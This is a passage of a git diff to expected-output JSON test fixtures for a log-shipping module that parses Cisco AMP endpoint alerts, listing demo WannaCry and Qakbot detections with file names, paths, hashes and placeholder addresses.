"53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 686000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", 
@@ -1292,11 +2254,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 70815, + "log.offset": 74476, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1325,10 +2291,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419204897366867977", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419247189909831753", + "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -1336,9 +2301,10 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 639000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 873000000, + "event.action": "Retrospective Detection", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", 
@@ -1347,11 +2313,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "qeriuwjhrf", + "file.path": "\\\\?\\C:\\Windows\\qeriuwjhrf", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", "input.type": "log", - "log.offset": 72027, + "log.offset": 75732, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1381,7 +2351,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", - "cisco.amp.detection_id": "6419247189909831755", + "cisco.amp.detection_id": "6419229327140847658", "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -1390,7 +2360,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 888000000, + "cisco.amp.timestamp_nanoseconds": 732000000, "event.action": "Retrospective Detection", "event.category": [ "file", @@ -1410,7 +2380,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 73239, + "log.offset": 76965, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1440,7 +2410,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", - "cisco.amp.detection_id": "6419247189909831754", + "cisco.amp.detection_id": "6419204897366867969", "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -1449,7 +2419,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 888000000, + "cisco.amp.timestamp_nanoseconds": 717000000, "event.action": "Retrospective Detection", "event.category": [ "file", 
@@ -1462,14 +2432,14 @@ "event.severity": 3, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "file.name": "tasksche.exe", - "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 74476, + "log.offset": 78202, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1499,7 +2469,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", - "cisco.amp.detection_id": "6419247189909831753", + "cisco.amp.detection_id": "6419179204872503298", "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -1508,7 +2478,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 873000000, + "cisco.amp.timestamp_nanoseconds": 686000000, "event.action": "Retrospective Detection", "event.category": [ "file", @@ -1520,15 +2490,15 @@ "event.module": "cisco", "event.severity": 3, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", - "file.name": "qeriuwjhrf", - "file.path": "\\\\?\\C:\\Windows\\qeriuwjhrf", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 75732, + "log.offset": 79439, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
@@ -1558,7 +2528,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", - "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.detection_id": "6419204897366867977", "cisco.amp.event_type_id": 553648147, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -1567,7 +2537,7 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 732000000, + "cisco.amp.timestamp_nanoseconds": 639000000, "event.action": "Retrospective Detection", "event.category": [ "file", @@ -1580,14 +2550,14 @@ "event.severity": 3, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "file.name": "tasksche.exe", - "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 76965, + "log.offset": 80676, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
@@ -1659,6 +2629,73 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6412604589194870787", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 573000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "32c9e6737dbdcbfb7563a3f27e2b1571", + "file.hash.sha1": "f5a171c879b90e77861daf19741b373646d791ff", + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 83114, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "32c9e6737dbdcbfb7563a3f27e2b1571", + "f5a171c879b90e77861daf19741b373646d791ff" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T15:24:25.000Z", 
"cisco.amp.computer.active": true, @@ -1787,6 +2824,59 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T15:24:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412604589194870785", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 994000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412604589194871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 87059, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T15:18:49.000Z", "cisco.amp.computer.active": true, 
@@ -1842,6 +2932,75 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T15:18:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419239055241773128", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 242000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419239055241773000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 89361, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": 
"cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T15:18:48.000Z", "cisco.amp.computer.active": true, diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json index 2dcd9193111e..a8bcab1df6e1 100644 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json 
@@ -1024,6 +1024,79 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T14:41:03.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 950000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229322845880000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 21793, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + 
"e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T14:37:40.000Z", "cisco.amp.computer.active": true, 
@@ -1187,6 +1260,187 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056775", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "qYf.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 26906, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 
"cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056774", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "4191700.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 28140, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056773", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", 
+ "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 29393, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T14:09:00.000Z", "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", 
@@ -1299,6 +1553,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T13:46:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D5221F6847-100.SBX.TG", + "cisco.amp.detection_id": "6264772016730013699", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 65000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772016730014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "48a0bf05b9706a00d2a0ff6260412f11", + "file.hash.sha1": "5058b16a86beee96927371210b9a9f682976a50a", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 33628, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "48a0bf05b9706a00d2a0ff6260412f11", + "5058b16a86beee96927371210b9a9f682976a50a" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T13:45:59.000Z", "cisco.amp.computer.active": true, 
@@ -1413,6 +1730,73 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741862", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 366000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 37453, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T13:43:32.000Z", 
"cisco.amp.computer.active": true, 
@@ -1632,9 +2016,140 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", - "cisco.amp.detection_id": "6419214500913741857", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741857", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43279, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741856", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 163000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44631, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + 